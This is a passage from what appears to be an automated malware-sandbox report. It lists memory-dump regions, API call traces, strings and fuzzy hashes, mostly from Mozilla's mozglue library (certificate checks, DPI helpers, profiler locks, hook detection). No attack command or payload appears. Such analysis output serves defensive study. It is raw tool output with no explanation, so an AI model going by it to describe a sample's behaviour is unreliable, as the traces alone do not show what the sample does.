                                                                  • Associated: 00000004.00000002.1957654994.0000000000F05000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000000F17000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.000000000104C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000001066000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000001089000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.00000000010F5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.0000000001413000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1957654994.00000000016BC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_ce0000_37664d9843.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59db19e93754608052b8db8a5f2feaa1e2968f9eb2f8ad028e16cacdd02bb997
                                                                  • Instruction ID: ee9daa4fc5c5c19dd4a025bb57851ae86638ffa55e055443e7fa2892b32a05be
                                                                  • Opcode Fuzzy Hash: 59db19e93754608052b8db8a5f2feaa1e2968f9eb2f8ad028e16cacdd02bb997
                                                                  • Instruction Fuzzy Hash: CB119470700111CFE365DF69D4C4A95B7DBAB8A300F648275E5848739DDB7D9C82CB54
                                                                  APIs
                                                                  • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C066CCC
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C066D11
                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C066D26
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C066D35
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C066D53
                                                                  • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C066D73
                                                                  • free.MOZGLUE(00000000), ref: 6C066D80
                                                                  • CertGetNameStringW.CRYPT32 ref: 6C066DC0
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C066DDC
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C066DEB
                                                                  • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C066DFF
                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C066E10
                                                                  • CryptMsgClose.CRYPT32(00000000), ref: 6C066E27
                                                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C066E34
                                                                  • CreateFileW.KERNEL32 ref: 6C066EF9
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C066F7D
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C066F8C
                                                                  • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C06709D
                                                                  • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C067103
                                                                  • free.MOZGLUE(00000000), ref: 6C067153
                                                                  • CloseHandle.KERNEL32(?), ref: 6C067176
                                                                  • __Init_thread_footer.LIBCMT ref: 6C067209
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06723A
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06726B
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06729C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0672DC
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06730D
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0673C2
                                                                  • VerSetConditionMask.NTDLL ref: 6C0673F3
                                                                  • VerSetConditionMask.NTDLL ref: 6C0673FF
                                                                  • VerSetConditionMask.NTDLL ref: 6C067406
                                                                  • VerSetConditionMask.NTDLL ref: 6C06740D
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C06741A
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C06755A
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C067568
                                                                  • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C067585
                                                                  • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C067598
                                                                  • free.MOZGLUE(00000000), ref: 6C0675AC
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                  • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll$3JT/
                                                                  • API String ID: 3256780453-2541344447
                                                                  • Opcode ID: dd0edf3351332e256e1539932e12b883c8d7976aff8eabd451339b343d0339f6
                                                                  • Instruction ID: 478717b49d29311123dfe67ad04d756050c713e09bcd59dcc393755501c5d82c
                                                                  • Opcode Fuzzy Hash: dd0edf3351332e256e1539932e12b883c8d7976aff8eabd451339b343d0339f6
                                                                  • Instruction Fuzzy Hash: 31529371A043149BEB21DF69CC84BAA77FDEF49708F108199E909A7A40DB71BB84CF51
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(user32,?,6C08E1A5), ref: 6C0B5606
                                                                  • LoadLibraryW.KERNEL32(gdi32,?,6C08E1A5), ref: 6C0B560F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C0B5633
                                                                  • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C0B563D
                                                                  • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C0B566C
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C0B567D
                                                                  • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C0B5696
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C0B56B2
                                                                  • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C0B56CB
                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C0B56E4
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C0B56FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C0B5716
                                                                  • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C0B572F
                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C0B5748
                                                                  • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C0B5761
                                                                  • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C0B577A
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C0B5793
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C0B57A8
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C0B57BD
                                                                  • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C0B57D5
                                                                  • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C0B57EA
                                                                  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C0B57FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                  • API String ID: 2238633743-1964193996
                                                                  • Opcode ID: 8617ba24c89068018388639d39293dccaf5b2905a8d4cad7da8685c51c9a1222
                                                                  • Instruction ID: 6e9acce7ca51a2499af63986ebf3b21f08e61c201723dcbc4f38043953948cdc
                                                                  • Opcode Fuzzy Hash: 8617ba24c89068018388639d39293dccaf5b2905a8d4cad7da8685c51c9a1222
                                                                  • Instruction Fuzzy Hash: 02514078711703ABDB009F35CD44B2A3BFCAB1A645B118969AE15F3A45EFB1E8018F61
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09F09B
                                                                    • Part of subcall function 6C075B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0756EE,?,00000001), ref: 6C075B85
                                                                    • Part of subcall function 6C075B50: EnterCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075B90
                                                                    • Part of subcall function 6C075B50: LeaveCriticalSection.KERNEL32(6C0DF688,?,?,?,6C0756EE,?,00000001), ref: 6C075BD8
                                                                    • Part of subcall function 6C075B50: GetTickCount64.KERNEL32 ref: 6C075BE4
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C09F0AC
                                                                    • Part of subcall function 6C075C50: GetTickCount64.KERNEL32 ref: 6C075D40
                                                                    • Part of subcall function 6C075C50: EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C075D67
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C09F0BE
                                                                    • Part of subcall function 6C075C50: __aulldiv.LIBCMT ref: 6C075DB4
                                                                    • Part of subcall function 6C075C50: LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C075DED
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C09F155
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F1E0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F1ED
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F212
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F229
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F231
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F248
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F2AE
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F2BB
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F2F8
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F350
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F35D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F381
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F398
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F3A0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F489
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F491
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F3CF
                                                                    • Part of subcall function 6C09F070: GetCurrentThreadId.KERNEL32 ref: 6C09F440
                                                                    • Part of subcall function 6C09F070: AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F44D
                                                                    • Part of subcall function 6C09F070: ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F472
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F4A8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F561
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F5A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling$3JT/
                                                                  • API String ID: 565197838-259927438
                                                                  • Opcode ID: 85615e2777073def2a168f275229d59d762a00dbde4fa96aaad6c4b41f60c820
                                                                  • Instruction ID: cfece7f2a2e52ad85a407ff2117b3137c9891f2373d5e4722e501eb3ca834f5a
                                                                  • Opcode Fuzzy Hash: 85615e2777073def2a168f275229d59d762a00dbde4fa96aaad6c4b41f60c820
                                                                  • Instruction Fuzzy Hash: 7FD1C5356043049FDB009F68D8447AA77FCEB46329F14861AFD6983B81DF74B948CBA6
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C0664DF
                                                                  • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C0664F2
                                                                  • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C066505
                                                                  • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C066518
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C06652B
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C06671C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C066724
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C06672F
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C066759
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C066764
                                                                  • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C066A80
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C066ABE
                                                                  • __Init_thread_footer.LIBCMT ref: 6C066AD3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C066AE8
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C066AF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll$3JT/
                                                                  • API String ID: 487479824-1623363300
                                                                  • Opcode ID: 8756bb30485728d363db3d8beb6087788f1f839b1e370d2d1c8fb46d8c61e638
                                                                  • Instruction ID: 8d8e3d202dc1a37c6d8d7ca1fc10085ffa3c69014f043119ce9b98874747f975
                                                                  • Opcode Fuzzy Hash: 8756bb30485728d363db3d8beb6087788f1f839b1e370d2d1c8fb46d8c61e638
                                                                  • Instruction Fuzzy Hash: 25F1D3709052199FDB20CF66CC88B9AB7F5AF46318F144299D819E7B41DB31BE84CF91
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,6C09E2A6), ref: 6C09E35E
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6C09E2A6), ref: 6C09E386
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09E3E4
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E3F1
                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C09E4AB
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E4F5
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09E577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E584
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09E5DE
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C09E8A6
                                                                    • Part of subcall function 6C05B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C05B7CF
                                                                    • Part of subcall function 6C05B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C05B808
                                                                    • Part of subcall function 6C0AB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6C0D0FB6,00000000,?,?,6C09E69E), ref: 6C0AB830
                                                                  • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C09E6DA
                                                                    • Part of subcall function 6C0AB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6C0AB916
                                                                    • Part of subcall function 6C0AB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6C0AB94A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C09E864
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09E883
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$3JT/
                                                                  • API String ID: 2698983630-3672379104
                                                                  • Opcode ID: 308d6b49ec0244b8360328dfacff2f3442ae08d95f80cf24d94d012ff6a330a1
                                                                  • Instruction ID: dac91af99e23a09f4e9c15439eef6412483b81d08f0fe114a256b7de82f91b8c
                                                                  • Opcode Fuzzy Hash: 308d6b49ec0244b8360328dfacff2f3442ae08d95f80cf24d94d012ff6a330a1
                                                                  • Instruction Fuzzy Hash: E8028B756043059FCB14CF68C484B6ABBF5FF89308F14492CE9AA9BB51DB30E945CB92
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C07EE7A
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C07EFB5
                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C081695
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0816B4
                                                                  • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C081770
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C081A3E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memset$freemallocmemcpy
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3693777188-2178588373
                                                                  • Opcode ID: 4cdf9dffcd78b457d7a8b906b73f3f037cd9d993e426c4d47a64048d3ea880bb
                                                                  • Instruction ID: 73a881d5193577403269a5c977844a5701fcd81e5930ea0b188a197e2c09cd60
                                                                  • Opcode Fuzzy Hash: 4cdf9dffcd78b457d7a8b906b73f3f037cd9d993e426c4d47a64048d3ea880bb
                                                                  • Instruction Fuzzy Hash: 1EB32871E052198FCF24CFA8C890B9DB7F2BF89304F6581A9D459AB745D730A986CF90
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C0DE744), ref: 6C067885
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE744), ref: 6C0678A5
                                                                  • EnterCriticalSection.KERNEL32(6C0DE784), ref: 6C0678AD
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE784), ref: 6C0678CD
                                                                  • EnterCriticalSection.KERNEL32(6C0DE7DC), ref: 6C0678D4
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0678E9
                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C06795D
                                                                  • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C0679BB
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C067BBC
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C067C82
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE7DC), ref: 6C067CD2
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C067DAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavememset
                                                                  • String ID: Dl$Dl$3JT/
                                                                  • API String ID: 759993129-3200603955
                                                                  • Opcode ID: ba57a5b5b5f2f9edd6a80400dce7bfe56ab2c968388ddba40965c3ea1a875a5a
                                                                  • Instruction ID: b961ee6004948470a861f12c7ee9ae4b46a35bea5038e79d75a6d85accbb1151
                                                                  • Opcode Fuzzy Hash: ba57a5b5b5f2f9edd6a80400dce7bfe56ab2c968388ddba40965c3ea1a875a5a
                                                                  • Instruction Fuzzy Hash: F4026171A0121A8FDB54CF19C984799B7F5FF88318F6582AAD819A7B51D730BE90CF80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpystrlen
                                                                  • String ID: (pre-xul)$data$name$schema$vl$3JT/
                                                                  • API String ID: 3412268980-759033640
                                                                  • Opcode ID: bf67dd9fb78b5a3ab01a7173be6069110fd4a149d89a06a6bd102ef216d2bab2
                                                                  • Instruction ID: 588b7f6f5a0c1caca49c9b5c8b2fa434929376d5f0f5e1a214be953cbcb34dcb
                                                                  • Opcode Fuzzy Hash: bf67dd9fb78b5a3ab01a7173be6069110fd4a149d89a06a6bd102ef216d2bab2
                                                                  • Instruction Fuzzy Hash: B2E161B1B043408BD714CF69884075BFBE9BBC5318F154A2DE899D7791EBB0ED098B92
                                                                  APIs
